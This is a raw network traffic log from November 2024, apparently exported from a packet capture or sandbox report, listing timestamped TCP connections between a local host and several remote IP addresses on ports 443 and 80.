                                                                                                                                                                                              Nov 24, 2024 13:39:21.517808914 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.517839909 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.518337011 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.518346071 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.633796930 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.634375095 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.634393930 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.634855986 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.634860039 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.724811077 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.725236893 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.725667953 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.725680113 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.725833893 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.725864887 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.726207018 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.726212025 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.726273060 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.726279020 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924108028 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924179077 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924237967 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924560070 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924582958 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924596071 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.924601078 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.929255962 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.929301977 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.929501057 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.929755926 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.929775953 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970236063 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970423937 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970503092 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970679998 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970700979 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970710993 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.970716000 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.973438978 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.973479033 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.973709106 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.974124908 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.974134922 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087182999 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087255955 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087338924 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087590933 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087610006 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087620974 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.087626934 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.090945005 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.090992928 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.091058969 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.091308117 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.091330051 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168318033 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168519020 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168576956 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168674946 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168694973 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168705940 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.168711901 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169507980 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169673920 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169733047 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169807911 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169831991 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169851065 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.169857979 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172045946 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172045946 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172072887 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172082901 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172132015 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172149897 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172327042 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172334909 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172338963 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:22.172346115 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.215429068 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.215533018 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.215713978 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:23.215836048 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:23.215852976 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.231977940 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:23.232014894 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.232104063 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:23.232469082 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:23.232481003 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.659065008 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.659724951 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.659740925 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.661787987 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.661793947 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.799650908 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.800391912 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.800441980 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.800864935 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.800873041 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.824070930 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.824582100 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.824598074 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.825107098 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.825112104 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.909092903 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.909722090 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.909742117 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.910234928 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.910239935 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.987375975 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.988214016 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.988246918 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:23.988759041 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:23.988766909 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.096606016 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.096678019 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.096729994 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.104496002 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.104522943 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.104532957 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.104538918 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.108397007 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.108444929 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.108515024 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.108658075 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.108675957 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243309975 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243524075 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243706942 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243760109 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243786097 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243799925 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.243805885 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.247242928 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.247282982 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.247373104 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.247517109 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.247529030 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263561964 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263629913 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263678074 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263962030 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263962030 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263972044 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.263981104 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.266470909 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.266510010 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.266583920 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.266715050 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.266725063 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346244097 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346395969 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346585035 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346685886 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346730947 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346761942 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.346779108 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.349951029 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.349983931 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.350075006 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.350214958 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.350229025 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.440670013 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.440839052 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.440897942 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.441093922 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.441113949 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.441148996 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.441155910 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.444720030 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.444762945 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.444828987 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.444976091 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:24.444989920 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.501940012 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.502043009 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:24.506198883 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:24.506218910 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.506495953 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:24.515620947 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:24.515641928 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:24.515701056 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257142067 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257538080 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257714987 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257805109 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257805109 CET49746443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257828951 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.257839918 CET44349746104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.318572998 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:25.438282967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.438409090 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:25.438653946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:25.558165073 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.913877964 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.914602041 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:25.914630890 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.916457891 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:25.916464090 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.998902082 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:25.999738932 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:25.999758005 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.000245094 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.000248909 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.047976017 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.048679113 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.048697948 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.049196005 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.049202919 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.173559904 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.183594942 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.183620930 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.184094906 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.184099913 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.270698071 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.271477938 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.271523952 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.271969080 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.271975040 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430232048 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430311918 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430442095 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430717945 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430742979 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430754900 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.430761099 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.434395075 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.434437990 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.434505939 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.434664011 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.434680939 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479300022 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479393005 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479481936 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479686022 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479707956 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479718924 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.479723930 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.482656002 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.482702017 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.482791901 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.482925892 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.482937098 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519289017 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519397974 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519495010 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519790888 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519818068 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519860029 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.519866943 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.523102999 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.523139000 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.523232937 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.523430109 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.523441076 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627007961 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627177000 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627240896 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627484083 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627505064 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627520084 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.627527952 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.630803108 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.630842924 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.630953074 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.631141901 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.631160975 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726237059 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726320028 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726370096 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726715088 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726736069 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726747990 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.726753950 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.729651928 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.729752064 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.729845047 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.730063915 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:26.730098963 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918443918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918494940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918513060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918550014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918576002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918576956 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918592930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918612957 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918617964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918636084 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918649912 CET4975280192.168.2.6185.215.113.16
